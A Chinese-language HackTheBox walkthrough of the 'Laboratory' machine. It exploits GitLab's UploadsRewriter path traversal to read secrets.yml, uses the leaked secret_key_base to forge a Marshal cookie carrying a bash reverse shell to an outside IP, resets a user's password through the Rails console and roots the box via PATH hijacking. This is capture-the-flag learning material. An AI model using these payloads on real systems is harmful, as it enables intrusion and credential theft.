HackTheBox-Laboratory

  • Name:Laboratory
  • OS:Linux

访问http://laboratory.htb,结果跳转到了https,检查证书可以得到另外一个子域名git.laboratory.htb
20210305-14:10:58-_7lJsOA_BemZkd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

git.laboratory.htb

访问git.laboratory.htb就会发现是个gitlab页面。可以自己注册,但是邮箱后缀必须是laboratory.htb。注册之后随便瞎逛,没什么发现。最后发现git版本。

0x02 漏洞利用

LFI

  1. 新建两个project(a和b)

  2. project a中提交一个issuse

    内容为:![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

  3. 将这个issuse移动到b项目中。

  4. 点击链接。

20210305-15:26:27-_Yo77Fs_cWKA87

漏洞详情:Arbitrary file read via the UploadsRewriter when moving an issue

RCE

但是如果继续阅读漏洞报告的话,你会发现这个LFI漏洞修改cookies_serializerhybrid最后会变成一个RCE漏洞

Hackone-Arbitrary file read via the UploadsRewriter when moving and issue

It’s possible to turn this into an RCE as the cookies_serializer is set to :hybrid by default.

The can be done by first grabbing the secret_key_base from /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml using the arbitrary file read and then use the experimentation_subject_id cookie with a Marshalled payload.

A payload can be generated by changing your own gitlab instances secret_key_base to match, then running the following in a rails console

依照着这个LFI的CVE找到了一个exp:gitlab_rce,不过需要进行修改。

1
2
3
self.email_domain = "gmail.htb"
改成
self.email_domain = "laboratory.htb"

也能利用这个脚本来拿到shell,但是是个受限的shell。
20210308-20:41:16-_odUWcv_hADuIi

20210308-17:34:05-_4mObfo_NK7CuU

这里建议手动利用这个漏洞,我是在本地搭建了gitlab环境来复现。

先利用LFI漏洞先读取secrets.yaml,来获取secret_key_base字段。

1
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

20210309-08:54:20-_VKsHlY_bljjkV

20210309-08:56:00-_JQy17p_AgTtwS

需要将本地的gitlab的secrets.yaml的secret_key_base字段替换为受害机的。

1
vim /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
1
secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3

20210309-09:06:32-_ZQ8xH0_8WVpIV

替换好之后,进入到radis console

依次输入以下内容,在获取到cookie之前,这些命令会在本机执行一次,所以在拿到cookie之后再监听端口。

1
sudo gitlab-rails console
1
2
3
4
5
6
7
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >& /dev/tcp/10.10.14.55/7777 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

20210309-11:28:11-_2lmE46_eVC8VY

20210309-09:19:19-_83wzq5_JvfiZX

20210309-09:19:48-_F09ZMj_JR4sM5

进入到radis console 中重置dextr用户密码

1
2
3
4
5
6
7
8
9
> user = User.where(id: 1).first
=> #<User id: 1, @dexter>
> user.password=12345678
=> 12345678
> user.password_confirmation=12345678
=> 12345678
> user.save!
=> true
> quit

20210309-09:25:12-_cwcvTg_KLHeJ2

成功登陆到dexter用户
20210309-09:31:38-_ZhhZjE_uWiWyI

在secure_docker项目中能找到id_rsa,下载下来,修改权限为600.
(最好自己复制下来,然后粘贴)
20210309-11:02:33-_kvn8FR_zj7SC9

20210309-10:27:21-_2p84tY_kahV6f

0x03 提权

进来后,先简单看了下suid位文件,结果。。
20210309-10:56:38-_d4Rnxf_eLbs1r

目标机器上没有strings。只能用cat看,一个很简单的二进制文件。
20210309-10:59:09-_o7tab0_TNUG4N

有用到chmod,但是没有用绝对路径,所以环境变量提权。

1
2
3
4
cd /tmp
echo '/usr/bin/bash' >chmod
export PATH=/tmp:$PATH
/usr/local/bin/docker-security

20210309-11:01:16-_XlTnl2_y7rD8G

0x04 参考